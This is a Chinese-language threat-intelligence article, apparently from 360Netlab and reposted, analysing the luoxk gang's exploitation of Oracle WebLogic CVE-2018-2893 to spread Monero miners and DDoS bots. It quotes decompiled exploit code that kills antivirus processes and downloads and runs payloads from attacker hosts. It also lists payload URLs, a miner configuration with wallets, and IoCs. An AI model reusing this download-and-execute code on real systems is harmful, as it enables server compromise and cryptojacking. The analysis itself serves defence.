内容简介:文章作者:Zhang Zaifeng, yegenshen, RootKiter, JiaYu7月18日,Oracle在官方发布的例行补丁更新中修复了CVE-2018-2893,一个Oracle WebLogic Server 远程代码执行漏洞。一般认为漏洞影响严重且相关PoC已经公开,建议相关用户尽快进行评估升级。三天后,2018-07-21 11:24:31 开始,我们注意到一个长久以来我们跟踪的恶意代码团伙正在积极利用该漏洞传播自身。由于该团伙经常使用 luoxkexp[.]com ,我们将其命名为
文章作者:Zhang Zaifeng, yegenshen, RootKiter, JiaYu
7月18日,Oracle在官方发布的例行补丁更新中修复了CVE-2018-2893,一个Oracle WebLogic Server 远程代码执行漏洞。一般认为漏洞影响严重且相关PoC已经公开,建议相关用户尽快进行评估升级。
三天后,2018-07-21 11:24:31 开始,我们注意到一个长久以来我们跟踪的恶意代码团伙正在积极利用该漏洞传播自身。由于该团伙经常使用 luoxkexp[.]com ,我们将其命名为 luoxk 。
该恶意代码团伙第一次触发我们的警铃是在一年前的2017年3月17日,我们的DNSMon系统,在该恶意代码团伙域名注册后的第二天根据算法自动判断该域名异常。
在那以后,我们持续观察了该恶意代码团伙的行为,包括:
48WDQHCe5aRDeHv1DkkdwQiPRQSqYw2DqEic7MZ47iJVVTeQ1aknDULfKj6qqLu6hy6xRZJu4BgYziSMbfzCGnqc54VekKH
下面是我们Botnet跟踪系统看到的最早的DDoS攻击指令,发生于 2017-06-11,受害者是 116.211.167.112。
2017-06-11 22:39:29 dsl4 luoxkexp.com 192.225.225.154 2015 ddos tcp_flood 116.211.167.112 15010 tcp_flood, target=116.211.167.112, port=15010, attack_time=20m, threads=30, type=22
luoxk 团伙近期利用 CVE-2018-2893 挖矿
21日起,luoxk 团伙开始利用仅发布了 3 天的CVE-2018-2893。漏洞利用主要通过下面这个文件实现
hxxp://103.99.115.220:8080/JexRemoteTools.jar #md5 hash 2f7df3baefb1cdcd7e7de38cc964c9dc
通过对该jar包反编译,可以注意到有以下关键代码
public JexReverse(String paramString, int paramInt) throws Exception { Properties localProperties = System.getProperties(); String str = localProperties.getProperty("os.name"); try { if (str.contains("Win")) { execw("taskkill /f /im 360Safe.exe"); execw("taskkill /f /im 360tray.exe"); downloadFile("hxxp://121.18.238.56:8080/aaa.exe", "59081.exe"); execw("cmd /c 59081.exe"); exec("59081.exe"); throw new Exception("8888: windows执行下载者命令"); } downloadFile("hxxp://121.18.238.56:8080/testshell.sh", "gen.sh"); execw("chmod 777 gen.sh"); exec("/bin/sh gen.sh"); } catch (Exception localException) { if (localException.toString().indexOf("8888") > -1) { throw localException; } throw new Exception("8888:" + new String(localException.toString()) + "\r\n"); } }
会从服务器上继续下载以下内容:
hxxp://121.18.238.56:8080/aaa.exe #下载服务器,继续下载xmrig矿机 hxxp://121.18.238.56:8080/testshell.sh #下载后续 SYN_145, SYN_7008, a4.sh, a5.sh hxxp://121.18.238.56:8080/SYN_145 #ddos.billgates C2=121.18.238.56:145 hxxp://121.18.238.56:8080/a4.sh #杀掉CPU占用率超过10% 的进程 hxxp://121.18.238.56:8080/SYN_7008 #ddos.billgates C2=121.18.238.56:7008 hxxp://121.18.238.56:8080/a5.sh #下载并运行下面的xmrig 矿机,同时杀掉除自己以外的CPU占用率超过10.0%的进程 hxxp://121.18.238.56/xmrig #xmrig矿机,被上面的a5.sh下载并运行 hxxp://luoxkexp.com:8099/ver1.txt #矿机运行配置,具体内容见下,当前挖矿收益 2.746605935XMR
矿机运行配置来自上述 ver1.txt,如下:
ver=1.5; pool=pool.minexmr.com; port=5555; user=48WDQHCe5aRDeHv1DkkdwQiPRQSqYw2DqEic7MZ47iJVVTeQ1aknDULfKj6qqLu6hy6xRZJu4BgYziSMbfzCGnqc54VekKH+15000; pass=x; algo=cryptonight; durl=http://121.18.238.56:8080/aaa.exe;
值得一提的是,该恶意团伙会禁止部分IP地址的访问。在我们分析的过程中,就遇到了这种情况,某些URL在一段时间后就不能从特定IP地址访问了。其他研究人员在复现本文内容时,可以考虑使用代理网络。
感染规模
从域名 luoxkexp[.]com 的访问情况看,单日DNS访问次数峰值超过300k,感染规模已经比较大。
并非结束
该团伙历史上使用过另外一个XRM钱包地址,在那个钱包里已经挖到了 195.625363870000 XMR:
pool: minexmr.com wallet: 44kPVQ3NvAQghr7BruiBLwieqU653B88wCZAt64UJBYy1eydmhd3gXC8Tx9nfGVdCCSUtKb37pHvi25DrjXzXNM2BEsNccG
该恶意团伙的工作范围非常广泛,除了本文已经介绍的内容以外,至少还包括:
- RAT远程控制 :使用了 Gh0st 家族恶意代码
- alipay:看到代码中包含了支付宝红包推广的行为,这可能意味着攻击者可以通过推广拿到提成
- 安卓恶意代码
- 利用RMI服务传播的蠕虫
这些内容也许我们会在后续文档中继续批露。
请持续关注我们的blog、 twitter 或者微信公众号360Netlab。
IoC
121.18.238.56 AS4837 CHINA UNICOM China169 Backbone 103.99.115.220 AS21859 Zenlayer Inc luoxkexp.com
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 网络犯罪团伙Silence利用恶意CHM文件瞄准俄罗斯银行
- 团伙作战 - DDoS攻击惯犯图鉴
- 如何利用开源威胁信息分析APT团伙
- 贪吃蛇挖矿木马团伙分析报告
- 绿盟科技《IP团伙行为分析》报告解读
- 窃密团伙瞄准企业机密信息,备用病毒超60个
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。